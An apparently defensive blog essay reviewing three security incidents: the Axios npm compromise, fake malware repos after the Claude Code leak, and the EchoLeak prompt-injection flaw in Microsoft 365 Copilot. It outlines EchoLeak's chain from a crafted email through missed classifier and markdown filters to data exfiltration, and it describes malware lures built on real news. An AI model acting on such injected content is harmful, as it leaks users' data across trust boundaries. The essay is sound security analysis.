A lot of AI security discussion still sounds speculative. After studying three real incidents, I think that framing is already obsolete.
Three incidents, one lesson
I studied three different incidents this week:
- the Axios npm compromise
- the Claude Code source leak followed by fake malware repos
- EchoLeak (CVE-2025-32711) in Microsoft 365 Copilot
These are not identical events. But together they draw a clean line:
AI-adjacent systems are already being attacked through trust, distribution, and context. Not just through code execution bugs. Not just through traditional endpoint malware. Through the places where modern software systems decide what is safe, useful, relevant, and worth acting on.
Case 1: Axios — trusted packages stay dangerous when they get popular enough
The Axios compromise is a supply chain story, but not a boring one. It shows how little code change is needed when the attacker reaches the right dependency at the right point in the ecosystem.
That matters to AI agents because agents are unusually willing to install, test, run, or suggest dependencies in the name of task completion. A package ecosystem attack becomes more dangerous when the consumer is a system optimized for speed and compliance.
Case 2: Claude Code — how fast curiosity becomes malware bait
The Claude Code story is not just about a leaked source map. It is about what happened next.
A real incident created search demand. Threat actors turned that demand into fake repositories, fake builds, and malicious downloads. The attack did not depend on inventing a believable lie from scratch. It depended on wrapping malware around a true headline.
That pattern is powerful:
- wait for a real security event
- borrow its legitimacy
- build a lure around urgency, scarcity, or exclusivity
- let users compromise themselves while trying to get closer to the truth
Developers are especially vulnerable to that move because they are trained to explore, test, fork, download, and reproduce. So are AI agents.
Case 3: EchoLeak — prompt injection feels operational now
EchoLeak is the case that changed the temperature for me. A named CVE. A major enterprise assistant. Critical severity. No user interaction in the scoring. An attack chain that reportedly started with a crafted email and ended in data exfiltration.
That is not a toy example. That is a production AI security failure.
The deep lesson is not just that prompt injection exists. It is that an AI system can be made to cross trust boundaries if the architecture gives it enough context and enough output channels.
That feels like the center of AI agent security now.
The pattern underneath all three
These incidents look different on the surface, but they rhyme in four ways.
1. They target trust, not just code
In all three cases, the attacker benefits by getting the system to trust the wrong thing: a package update, a fake repo, a retrieved email.
2. They weaponize normal workflows
Nothing here depends on obviously criminal behavior from the victim. The workflows are ordinary: install a package, investigate a leak, ask Copilot to summarize your work. That is what makes detection harder. The hostile action hides inside routine behavior.
3. They chain small weaknesses
The scary version of modern attacks is often not one giant hole. It is multiple almost-reasonable assumptions that fail in sequence. EchoLeak especially looks like this: content reaches the retriever, classifier misses it, markdown filtering misses an alternate syntax, fetch behavior still permits exfil, the whole system becomes a confused deputy.
4. They exploit speed
Modern software ecosystems move fast. Agents move faster. That speed is useful until it becomes the attack surface. The system that can ingest, summarize, install, route, or fetch the fastest may also be the easiest one to steer before a human notices.
What this means for Sunglasses
If Sunglasses is going to matter, it has to think one level higher than simple content scanning.
It cannot only ask: does this string look malicious?
It has to ask:
- what role is this content playing?
- where did it come from?
- what will the agent do next if it trusts it?
- what new egress paths become available if the content lands in context?
- which alternate syntaxes or tool paths make the defense incomplete?
That is a bigger problem. But it is the right one.
My current belief
I do not think the hardest AI agent attacks will look like dramatic jailbreak prompts forever. I think the harder attacks will look boring. They will look like:
- a document
- a package
- a repo
- an issue
- a support email
- a link reference
- an allowed proxy request
The weapon is not always the content by itself. The weapon is the path the system takes after reading it.
AI agent attacks have already stopped looking theoretical. The only real question is whether defenders will model them as full systems problems before attackers get even better at chaining them.
— JACK